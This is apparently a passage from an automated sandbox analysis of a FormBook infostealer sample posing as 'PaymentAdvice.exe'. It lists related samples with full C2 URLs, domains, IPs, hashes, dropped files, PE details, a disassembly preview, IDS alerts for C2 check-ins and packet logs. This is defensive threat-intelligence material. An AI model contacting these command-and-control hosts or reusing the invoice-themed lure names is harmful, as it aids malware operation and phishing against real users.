 | 2021-04-01.exe | malicious | www.tollisenschool.com/g7b/?o2=iL30VlAxs&8pntMJ6P=IosHUe5U7sgPlvQ08qcmYS3dN02u+cj8WLYYiVwUOXtKG3qUsmBBVHLqlghXUv6T7qPq
 | onbgX3WswF.exe | malicious | www.sgdivergence.com/c22b/?w6=cbaAnqZg13PDvDAp4rbrvZjl753VAJ/hVAzUOls5TeU5Jx4pkABxsKYQ72QgGrkYw3xe&1b=W6O4DXSP5
 | ARBmDNJS7m.exe | malicious | www.bootstrapexpress.com/aqu2/?rPj0Qr6=nYriP3GcRBwukkcsj3Cw6qOI4UbADI9fnlgfdFCApi4mXX+dpAaC8djN6XYIns7fxRpg&tXrx=gdkpfvSpm
 | Bista_094924,ppdf.exe | malicious | www.simplyhealrhcareplans.com/sqra/?EBZ=ZTIti4FxbnDxH&YVMp8pfx=n3U7aY9a5ujS+qWiRfdW0plv/0Nv8djS+qMboD1ih5qiP+MT365v99ebZUVRUFJkYzoK
 | PO.1183.exe | malicious | www.dentalenhancments.com/god/?XDKPxrlh=EnxYEfX2deexTb058Y7c97BLkeqRbsEiixp341UOoiLWyojMB+48BbQ1WdyM7J0osU9+&anM=LjfLu4hPXh18f
 | Scan-45679.exe | malicious | www.wwwrigalinks.com/gwam/?Bjq=CXJcwEGd359wd7S74zzuJNqJGNLbtnXn+r8vDW7RCwie8OTRcmbQ6IgfXutP9/RkpDpW&Efzxz2=2dut_L3xNbOxThN
 | TT Remittance Copy.PDF.exe | malicious | www.creditcorecard.com/ihmh/?wP9=1bJfls8sWvOO1f7Vh8wqJhCF9whiFTpEYoud4iYCKocbr8IRO//r9FkTIR4//YxGu1lm&lZQ=7nbLunBhP
 | DK Purchase Order 2021 - 00041.exe | malicious | www.atualizacao.net/vsk9/?GFQH8=DklfZSbfSG8rWu2eKGFDH5WZs9/qq3j2XcYy6rNlSIz25CVNqPMMuncxEVlgc+oIXeWq&llsp=gTULpTwpERQd0J
 | 9tRIEZUd1j.exe | malicious | www.bootstrapexpress.com/aqu2/?5j=nYriP3GcRBwukkcsj3Cw6qOI4UbADI9fnlgfdFCApi4mXX+dpAaC8djN6XYi4cLf1Thg&_P=2dhtaH9
 | Revised Signed Proforma Invoice 000856453553.exe | malicious | www.nhu.xyz/fhg5/?Ppm=_6g8CjxH3jrHh&jFNl2H=VbAsszw93WcD6z21S0kZ/XCztDQBFhX49HLTNSyQRl++wquAZ3b8+Wv/gXH+lVuiRgQj
35.214.93.182 | PaymentInvoice.exe | malicious | www.webinast.com/c22b/?k6A0=1WYFPCFAa+jpHIB9BnILU4C06qq5pGhvLsRWbgBa8h/dn7fbRDy+A9fX1Fu0aL3zxHrIzqJQ5A==&Jhk=xN90gjnxaL

                                                                Domains

Match | Associated Sample Name / URL | Detection | Context
www.brandschutzglas.com | PaymentAdvice.exe | malicious | 81.19.159.73
www.saturnkorp.net | PaymentAdvice.exe | malicious | 75.126.101.233
 | PaymentInvoice.exe | malicious | 75.126.101.233
 | PaymentInvoice.exe | malicious | 75.126.101.233
 | PaymentInvoice.exe | malicious | 75.126.101.233
www.plataformaporelmarcanario.com | PaymentAdvice.exe | malicious | 52.142.208.184
 | onbgX3WswF.exe | malicious | 52.142.208.184
 | PaymentInvoice.exe | malicious | 52.142.208.184
www.vtz6whu5254xb1.xyz | PaymentInvoice.exe | malicious | 49.156.179.238
 | onbgX3WswF.exe | malicious | 49.156.179.238
www.sgdivergence.com | PaymentInvoice.exe | malicious | 199.59.242.153
 | onbgX3WswF.exe | malicious | 199.59.242.153
www.abolishlawinforcement.com | PaymentInvoice.exe | malicious | 66.96.162.131

                                                                ASN


                                                                JA3 Fingerprints

                                                                No context

                                                                Dropped Files

                                                                No context

                                                                Created / dropped Files

                                                                C:\Users\user\AppData\Local\Temp\9c4j8z4frqpd7zc1x010
                                                                Process:C:\Users\user\Desktop\PaymentAdvice.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):6661
                                                                Entropy (8bit):6.6296815878574
                                                                Encrypted:false
                                                                SSDEEP:192:puD7N/LnAKy7uWDpAK7ZcPkPkYuMq9fIN4FE7L3P:puD7NTAGW1KPnpGWQP
                                                                MD5:4ECE2D8EFA5135A9DB156CC14BD4BAA4
                                                                SHA1:3436B53414E1502C72F1EC533B67ECF2D4CB2A77
                                                                SHA-256:9CDD65FD2596E32C1F8E7CC24D7318FA158B84B0AD588338FE0A91CB6EE94403
                                                                SHA-512:6EA6B0C6311839CB6C7A7425E3C887F60C7E0F9507D4551A4B5CE4BD0764E2197E0A2927B8B35F0790FDE2BE34BA1A432C53342F34412EFABE74771755247CD2
                                                                Malicious:false
                                                                Reputation:low
                                                                C:\Users\user\AppData\Local\Temp\nse41F3.tmp\ic4muy4.dll
                                                                Process:C:\Users\user\Desktop\PaymentAdvice.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):4096
                                                                Entropy (8bit):4.151333512519193
                                                                Encrypted:false
                                                                SSDEEP:48:vpgBspoKnM4qq0vOvvOcTLNuLebdsbriB4ZYmRn:B/po94qT2JnktfiuZVRn
                                                                MD5:FCEA56E70876A90B0C60EC7BA70E9B30
                                                                SHA1:DEC05872A2525CCDC225ADBC620E809C199920A9
                                                                SHA-256:9308D8307FD10AD6AD3A48696B353BEEAB443DC13931E37594A845A4E9ED6059
                                                                SHA-512:075DD6EA258329606F34FC607B9E3D842986B139E1C541F73CDCE7C2A3DDFDA9D4C100A0F5C1E1A21A09F97AA1A3AA923F73D9AE6BD381D28BDAAC6C5F6E9913
                                                                Malicious:false
                                                                Reputation:low
                                                                C:\Users\user\AppData\Local\Temp\v1q9hgnkdhn69j4o932
                                                                Process:C:\Users\user\Desktop\PaymentAdvice.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):164864
                                                                Entropy (8bit):7.998764468176309
                                                                Encrypted:true
                                                                SSDEEP:3072:d0KAsddxWkAfp/M5e+oMS885Lba5jq/HltPX25hcjuQfqq4/H:iKBnOpsvV85Lbmq/F92DcyQfqj
                                                                MD5:24DEB1E3972821F5540014A80FEFF6B0
                                                                SHA1:75390DA39428FB16D225851E4331681A6AA49984
                                                                SHA-256:1E13BF9EDAEE2DC001F2EB5960C0FAD8541C3B3F82BC099D85D15CB95F511CAB
                                                                SHA-512:32048E34CAC8F2BAA9D2AA2CC19BF57AB7B7D726DBD9067A0A8899F962FD09B01B90835DD44971C6D133CBC4F3B09BE80C0A35D09CE0AC22F2148E53BC87C5DA
                                                                Malicious:false
                                                                Reputation:low

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                Entropy (8bit):7.105149467378694
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:PaymentAdvice.exe
                                                                File size:357134
                                                                MD5:91937d3f9e93657c18129ff519b7f340
                                                                SHA1:d9acfebf2120d984d76bdf883094707305897691
                                                                SHA256:397fd95899f186c1385818c6b996f4cb410e266a84b2c134104d01675a822e27
                                                                SHA512:5750d58265a25f8f438d939a9d32d0634f5483a17a357805240eec4cff8e544e8580ad880ae85c9fb74b5e3a70b6b24c4bf96a58bab0d847f07dddd019d63ca5
                                                                SSDEEP:3072:3yewmN4skJ3pn+w2xYQO26G0KAsddxWkAfp/M5e+oMS885Lba5jq/HltPX25hcjO:3dtpYKBnOpsvV85Lbmq/F92DcyQfqj

                                                                File Icon

                                                                Icon Hash:70f8f0b2daf8f0b8

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x40314a
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                DLL Characteristics:
                                                                Time Stamp:0x4538CD0B [Fri Oct 20 13:20:11 2006 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:18bc6fa81e19f21156316b1ae696ed6b

                                                                Entrypoint Preview

                                                                Instruction
                                                                sub esp, 0000017Ch
                                                                push ebx
                                                                push ebp
                                                                push esi
                                                                xor esi, esi
                                                                push edi
                                                                mov dword ptr [esp+18h], esi
                                                                mov ebp, 00409240h
                                                                mov byte ptr [esp+10h], 00000020h
                                                                call dword ptr [00407030h]
                                                                push esi
                                                                call dword ptr [00407270h]
                                                                mov dword ptr [007A3030h], eax
                                                                push esi
                                                                lea eax, dword ptr [esp+30h]
                                                                push 00000160h
                                                                push eax
                                                                push esi
                                                                push 0079E540h
                                                                call dword ptr [00407158h]
                                                                push 00409230h
                                                                push 007A2780h
                                                                call 00007FD94C919D08h
                                                                mov ebx, 007AA400h
                                                                push ebx
                                                                push 00000400h
                                                                call dword ptr [004070B4h]
                                                                call 00007FD94C917449h
                                                                test eax, eax
                                                                jne 00007FD94C917506h
                                                                push 000003FBh
                                                                push ebx
                                                                call dword ptr [004070B0h]
                                                                push 00409228h
                                                                push ebx
                                                                call 00007FD94C919CF3h
                                                                call 00007FD94C917429h
                                                                test eax, eax
                                                                je 00007FD94C917622h
                                                                mov edi, 007A9000h
                                                                push edi
                                                                call dword ptr [00407140h]
                                                                call dword ptr [004070ACh]
                                                                push eax
                                                                push edi
                                                                call 00007FD94C919CB1h
                                                                push 00000000h
                                                                call dword ptr [00407108h]
                                                                cmp byte ptr [007A9000h], 00000022h
                                                                mov dword ptr [007A2F80h], eax
                                                                mov eax, edi
                                                                jne 00007FD94C9174ECh
                                                                mov byte ptr [esp+10h], 00000022h
                                                                mov eax, 00000001h

                                                                Rich Headers

                                                                Programming Language:
                                                                • [EXP] VC++ 6.0 SP5 build 8804

                                                                Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7344 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3ac000 | 0x25bdf | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x280 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x59de | 0x5a00 | False | 0.681293402778 | data | 6.5143386598 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x10f2 | 0x1200 | False | 0.430338541667 | data | 5.0554281206 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x39a034 | 0x400 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x3a4000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x3ac000 | 0x25bdf | 0x25c00 | False | 0.338453280215 | data | 5.34146609609 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x3ac2e0 | 0x7108 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | |
RT_ICON | 0x3b33e8 | 0x10828 | dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0 | |
RT_ICON | 0x3c3c10 | 0x5488 | data | |
RT_ICON | 0x3c9098 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295 | |
RT_ICON | 0x3cd2c0 | 0x25a8 | data | |
RT_ICON | 0x3cf868 | 0x10a8 | data | |
RT_ICON | 0x3d0910 | 0x988 | data | |
RT_ICON | 0x3d1298 | 0x468 | GLS_BINARY_LSB_FIRST | |
RT_DIALOG | 0x3d1700 | 0x100 | data | English | United States
RT_DIALOG | 0x3d1800 | 0x11c | data | English | United States
RT_DIALOG | 0x3d191c | 0x60 | data | English | United States
RT_GROUP_ICON | 0x3d197c | 0x76 | data | |
RT_MANIFEST | 0x3d19f4 | 0x1eb | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

                                                                Imports

                                                                DLLImport
                                                                KERNEL32.dllCloseHandle, SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, lstrcmpiA, ExitProcess, GetCommandLineA, GetWindowsDirectoryA, GetTempPathA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetEnvironmentVariableA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
                                                                USER32.dllScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                SHELL32.dllSHGetMalloc, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                ole32.dllOleInitialize, OleUninitialize, CoCreateInstance
                                                                VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                Possible Origin

                                                                Language of compilation systemCountry where language is spokenMap
                                                                EnglishUnited States

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
04/08/21-12:39:40.904517 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49729 | 80 | 192.168.2.5 | 66.96.162.131
04/08/21-12:39:40.904517 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49729 | 80 | 192.168.2.5 | 66.96.162.131
04/08/21-12:39:40.904517 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49729 | 80 | 192.168.2.5 | 66.96.162.131
04/08/21-12:40:07.392083 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49733 | 80 | 192.168.2.5 | 108.167.140.96
04/08/21-12:40:07.392083 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49733 | 80 | 192.168.2.5 | 108.167.140.96
04/08/21-12:40:07.392083 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49733 | 80 | 192.168.2.5 | 108.167.140.96
04/08/21-12:40:13.082386 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49736 | 34.102.136.180 | 192.168.2.5
04/08/21-12:40:18.180223 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49737 | 80 | 192.168.2.5 | 52.142.208.184
04/08/21-12:40:18.180223 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49737 | 80 | 192.168.2.5 | 52.142.208.184
04/08/21-12:40:18.180223 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49737 | 80 | 192.168.2.5 | 52.142.208.184
04/08/21-12:40:30.030371 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49739 | 75.126.101.233 | 192.168.2.5
04/08/21-12:40:35.274483 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49740 | 80 | 192.168.2.5 | 199.59.242.153
04/08/21-12:40:35.274483 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49740 | 80 | 192.168.2.5 | 199.59.242.153
04/08/21-12:40:35.274483 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49740 | 80 | 192.168.2.5 | 199.59.242.153
04/08/21-12:40:41.011044 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49741 | 80 | 192.168.2.5 | 154.90.117.58
04/08/21-12:40:41.011044 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49741 | 80 | 192.168.2.5 | 154.90.117.58
04/08/21-12:40:41.011044 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49741 | 80 | 192.168.2.5 | 154.90.117.58

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 8, 2021 12:39:40.789573908 CEST | 49729 | 80 | 192.168.2.5 | 66.96.162.131
Apr 8, 2021 12:39:40.904059887 CEST | 80 | 49729 | 66.96.162.131 | 192.168.2.5
Apr 8, 2021 12:39:40.904232025 CEST | 49729 | 80 | 192.168.2.5 | 66.96.162.131
Apr 8, 2021 12:39:40.904516935 CEST | 49729 | 80 | 192.168.2.5 | 66.96.162.131
Apr 8, 2021 12:39:41.019202948 CEST | 80 | 49729 | 66.96.162.131 | 192.168.2.5
Apr 8, 2021 12:39:41.035171032 CEST | 80 | 49729 | 66.96.162.131 | 192.168.2.5
Apr 8, 2021 12:39:41.035185099 CEST | 80 | 49729 | 66.96.162.131 | 192.168.2.5
Apr 8, 2021 12:39:41.035372019 CEST | 49729 | 80 | 192.168.2.5 | 66.96.162.131
Apr 8, 2021 12:39:41.035423994 CEST | 49729 | 80 | 192.168.2.5 | 66.96.162.131
Apr 8, 2021 12:39:41.149666071 CEST | 80 | 49729 | 66.96.162.131 | 192.168.2.5
Apr 8, 2021 12:39:46.080517054 CEST | 49730 | 80 | 192.168.2.5 | 35.214.93.182
Apr 8, 2021 12:39:46.122618914 CEST | 80 | 49730 | 35.214.93.182 | 192.168.2.5
Apr 8, 2021 12:39:46.122750044 CEST | 49730 | 80 | 192.168.2.5 | 35.214.93.182
Apr 8, 2021 12:39:46.122944117 CEST | 49730 | 80 | 192.168.2.5 | 35.214.93.182
Apr 8, 2021 12:39:46.164413929 CEST | 80 | 49730 | 35.214.93.182 | 192.168.2.5
Apr 8, 2021 12:39:46.172902107 CEST | 80 | 49730 | 35.214.93.182 | 192.168.2.5
Apr 8, 2021 12:39:46.172936916 CEST | 80 | 49730 | 35.214.93.182 | 192.168.2.5
Apr 8, 2021 12:39:46.173075914 CEST | 49730 | 80 | 192.168.2.5 | 35.214.93.182
Apr 8, 2021 12:39:46.173142910 CEST | 49730 | 80 | 192.168.2.5 | 35.214.93.182
Apr 8, 2021 12:39:46.214449883 CEST | 80 | 49730 | 35.214.93.182 | 192.168.2.5
Apr 8, 2021 12:39:51.223727942 CEST | 49731 | 80 | 192.168.2.5 | 184.168.131.241
Apr 8, 2021 12:39:51.401798010 CEST | 80 | 49731 | 184.168.131.241 | 192.168.2.5
Apr 8, 2021 12:39:51.401945114 CEST | 49731 | 80 | 192.168.2.5 | 184.168.131.241
Apr 8, 2021 12:39:51.402147055 CEST | 49731 | 80 | 192.168.2.5 | 184.168.131.241
Apr 8, 2021 12:39:51.580137968 CEST | 80 | 49731 | 184.168.131.241 | 192.168.2.5
Apr 8, 2021 12:39:51.606599092 CEST | 80 | 49731 | 184.168.131.241 | 192.168.2.5
Apr 8, 2021 12:39:51.606637955 CEST | 80 | 49731 | 184.168.131.241 | 192.168.2.5
Apr 8, 2021 12:39:51.609797955 CEST | 49731 | 80 | 192.168.2.5 | 184.168.131.241
Apr 8, 2021 12:39:51.609961987 CEST | 49731 | 80 | 192.168.2.5 | 184.168.131.241
Apr 8, 2021 12:39:51.787822962 CEST | 80 | 49731 | 184.168.131.241 | 192.168.2.5
Apr 8, 2021 12:40:01.991251945 CEST | 49732 | 80 | 192.168.2.5 | 81.19.159.73
Apr 8, 2021 12:40:02.025295973 CEST | 80 | 49732 | 81.19.159.73 | 192.168.2.5
Apr 8, 2021 12:40:02.025412083 CEST | 49732 | 80 | 192.168.2.5 | 81.19.159.73
Apr 8, 2021 12:40:02.025681973 CEST | 49732 | 80 | 192.168.2.5 | 81.19.159.73
Apr 8, 2021 12:40:02.060189009 CEST | 80 | 49732 | 81.19.159.73 | 192.168.2.5
Apr 8, 2021 12:40:02.060216904 CEST | 80 | 49732 | 81.19.159.73 | 192.168.2.5
Apr 8, 2021 12:40:02.060676098 CEST | 49732 | 80 | 192.168.2.5 | 81.19.159.73
Apr 8, 2021 12:40:02.061580896 CEST | 80 | 49732 | 81.19.159.73 | 192.168.2.5
Apr 8, 2021 12:40:02.061651945 CEST | 49732 | 80 | 192.168.2.5 | 81.19.159.73
Apr 8, 2021 12:40:02.091130018 CEST | 80 | 49732 | 81.19.159.73 | 192.168.2.5
Apr 8, 2021 12:40:07.243345976 CEST | 49733 | 80 | 192.168.2.5 | 108.167.140.96
Apr 8, 2021 12:40:07.390485048 CEST | 80 | 49733 | 108.167.140.96 | 192.168.2.5
Apr 8, 2021 12:40:07.392054081 CEST | 49733 | 80 | 192.168.2.5 | 108.167.140.96
Apr 8, 2021 12:40:07.392082930 CEST | 49733 | 80 | 192.168.2.5 | 108.167.140.96
Apr 8, 2021 12:40:07.539179087 CEST | 80 | 49733 | 108.167.140.96 | 192.168.2.5
Apr 8, 2021 12:40:07.883732080 CEST | 49733 | 80 | 192.168.2.5 | 108.167.140.96
Apr 8, 2021 12:40:08.071639061 CEST | 80 | 49733 | 108.167.140.96 | 192.168.2.5
Apr 8, 2021 12:40:08.338521957 CEST | 80 | 49733 | 108.167.140.96 | 192.168.2.5
Apr 8, 2021 12:40:08.338653088 CEST | 80 | 49733 | 108.167.140.96 | 192.168.2.5
Apr 8, 2021 12:40:08.338666916 CEST | 49733 | 80 | 192.168.2.5 | 108.167.140.96
Apr 8, 2021 12:40:08.338704109 CEST | 49733 | 80 | 192.168.2.5 | 108.167.140.96
Apr 8, 2021 12:40:12.955671072 CEST | 49736 | 80 | 192.168.2.5 | 34.102.136.180
Apr 8, 2021 12:40:12.968401909 CEST | 80 | 49736 | 34.102.136.180 | 192.168.2.5
Apr 8, 2021 12:40:12.968549967 CEST | 49736 | 80 | 192.168.2.5 | 34.102.136.180
Apr 8, 2021 12:40:12.968741894 CEST | 49736 | 80 | 192.168.2.5 | 34.102.136.180
Apr 8, 2021 12:40:12.981177092 CEST | 80 | 49736 | 34.102.136.180 | 192.168.2.5
Apr 8, 2021 12:40:13.082386017 CEST | 80 | 49736 | 34.102.136.180 | 192.168.2.5
Apr 8, 2021 12:40:13.082421064 CEST | 80 | 49736 | 34.102.136.180 | 192.168.2.5
Apr 8, 2021 12:40:13.083111048 CEST | 49736 | 80 | 192.168.2.5 | 34.102.136.180
Apr 8, 2021 12:40:13.083240986 CEST | 49736 | 80 | 192.168.2.5 | 34.102.136.180
Apr 8, 2021 12:40:13.095765114 CEST | 80 | 49736 | 34.102.136.180 | 192.168.2.5
Apr 8, 2021 12:40:18.155721903 CEST | 49737 | 80 | 192.168.2.5 | 52.142.208.184
Apr 8, 2021 12:40:18.179723024 CEST | 80 | 49737 | 52.142.208.184 | 192.168.2.5
Apr 8, 2021 12:40:18.179909945 CEST | 49737 | 80 | 192.168.2.5 | 52.142.208.184
Apr 8, 2021 12:40:18.180222988 CEST | 49737 | 80 | 192.168.2.5 | 52.142.208.184
Apr 8, 2021 12:40:18.203510046 CEST | 80 | 49737 | 52.142.208.184 | 192.168.2.5
Apr 8, 2021 12:40:18.665832996 CEST | 49737 | 80 | 192.168.2.5 | 52.142.208.184
Apr 8, 2021 12:40:18.690045118 CEST | 80 | 49737 | 52.142.208.184 | 192.168.2.5
Apr 8, 2021 12:40:18.690273046 CEST | 49737 | 80 | 192.168.2.5 | 52.142.208.184
Apr 8, 2021 12:40:24.596085072 CEST | 49738 | 80 | 192.168.2.5 | 104.21.85.234
Apr 8, 2021 12:40:24.613862038 CEST | 80 | 49738 | 104.21.85.234 | 192.168.2.5
Apr 8, 2021 12:40:24.613954067 CEST | 49738 | 80 | 192.168.2.5 | 104.21.85.234
Apr 8, 2021 12:40:24.619865894 CEST | 49738 | 80 | 192.168.2.5 | 104.21.85.234
Apr 8, 2021 12:40:24.637587070 CEST | 80 | 49738 | 104.21.85.234 | 192.168.2.5
Apr 8, 2021 12:40:24.656661034 CEST | 80 | 49738 | 104.21.85.234 | 192.168.2.5
Apr 8, 2021 12:40:24.656760931 CEST | 80 | 49738 | 104.21.85.234 | 192.168.2.5
Apr 8, 2021 12:40:24.656930923 CEST | 49738 | 80 | 192.168.2.5 | 104.21.85.234
Apr 8, 2021 12:40:24.677726984 CEST | 49738 | 80 | 192.168.2.5 | 104.21.85.234
Apr 8, 2021 12:40:24.695456028 CEST | 80 | 49738 | 104.21.85.234 | 192.168.2.5
Apr 8, 2021 12:40:29.740457058 CEST | 49739 | 80 | 192.168.2.5 | 75.126.101.233
Apr 8, 2021 12:40:29.885278940 CEST | 80 | 49739 | 75.126.101.233 | 192.168.2.5
Apr 8, 2021 12:40:29.885428905 CEST | 49739 | 80 | 192.168.2.5 | 75.126.101.233
Apr 8, 2021 12:40:29.885621071 CEST | 49739 | 80 | 192.168.2.5 | 75.126.101.233
Apr 8, 2021 12:40:30.030329943 CEST | 80 | 49739 | 75.126.101.233 | 192.168.2.5
Apr 8, 2021 12:40:30.030370951 CEST | 80 | 49739 | 75.126.101.233 | 192.168.2.5
Apr 8, 2021 12:40:30.030384064 CEST | 80 | 49739 | 75.126.101.233 | 192.168.2.5
Apr 8, 2021 12:40:30.030628920 CEST | 49739 | 80 | 192.168.2.5 | 75.126.101.233
Apr 8, 2021 12:40:30.030708075 CEST | 49739 | 80 | 192.168.2.5 | 75.126.101.233
Apr 8, 2021 12:40:30.175600052 CEST | 80 | 49739 | 75.126.101.233 | 192.168.2.5
Apr 8, 2021 12:40:35.163100004 CEST | 49740 | 80 | 192.168.2.5 | 199.59.242.153
Apr 8, 2021 12:40:35.273744106 CEST | 80 | 49740 | 199.59.242.153 | 192.168.2.5
Apr 8, 2021 12:40:35.273957968 CEST | 49740 | 80 | 192.168.2.5 | 199.59.242.153
Apr 8, 2021 12:40:35.274482965 CEST | 49740 | 80 | 192.168.2.5 | 199.59.242.153
Apr 8, 2021 12:40:35.385809898 CEST | 80 | 49740 | 199.59.242.153 | 192.168.2.5
Apr 8, 2021 12:40:35.386007071 CEST | 80 | 49740 | 199.59.242.153 | 192.168.2.5
Apr 8, 2021 12:40:35.386203051 CEST | 80 | 49740 | 199.59.242.153 | 192.168.2.5
Apr 8, 2021 12:40:35.386205912 CEST | 80 | 49740 | 199.59.242.153 | 192.168.2.5
Apr 8, 2021 12:40:35.386214972 CEST | 80 | 49740 | 199.59.242.153 | 192.168.2.5
